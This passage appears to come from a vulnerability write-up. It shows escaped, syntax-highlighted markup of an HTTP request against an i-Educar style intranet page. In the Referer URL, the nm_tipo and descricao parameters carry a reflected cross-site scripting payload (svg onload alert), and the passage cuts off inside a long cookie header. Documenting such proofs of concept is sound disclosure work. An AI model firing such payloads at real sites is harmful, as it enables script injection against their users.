&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;User&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Agent&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Mozilla&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;5.0&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;X11&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Linux&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;x86_64&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;rv&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;128.0&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Gecko&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20100101&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Firefox&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;128.0&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Accept&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;html&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;application&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;xhtml&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&#43;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;xml&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;application&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;xml&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;q&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;0.9&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;*/*&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;q&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;0.8&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Accept&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Language&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;en&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;US&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;en&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;q&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;0.5&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Accept&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Encoding&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;gzip&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;deflate&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;br&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;zstd&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Connection&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;keep&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;alive&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Referer&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;http&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;//&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;localhost&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;intranet&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;educar_tipo_usuario_lst&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;php&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;?&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;busca&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;S&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;nm_tipo&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Csvg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&#43;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Dalert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2812&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;descricao&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Csvg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&#43;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Dalert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2812&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;nivel&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;grav&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;admin&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flexpages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;grav&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tabs&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;state&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;--&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f0e041eed24f87f2b6b02fd6924d0a08&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;languages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;e838602f51515c83bca06a8ae758ce52&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;security&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;b6676b27f5cdf6b6c22f8e18da4259a0&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;advanced&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;raw&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;8&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f0a83a672754f7823714134334b1de8&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;content&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;dc26c564cb2116d77bda5fff24ba90dc&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;security&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex_conf&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;user_groups&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;accounts&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;02&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f0e9f68f41a0648ed530f80bd72c06&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span 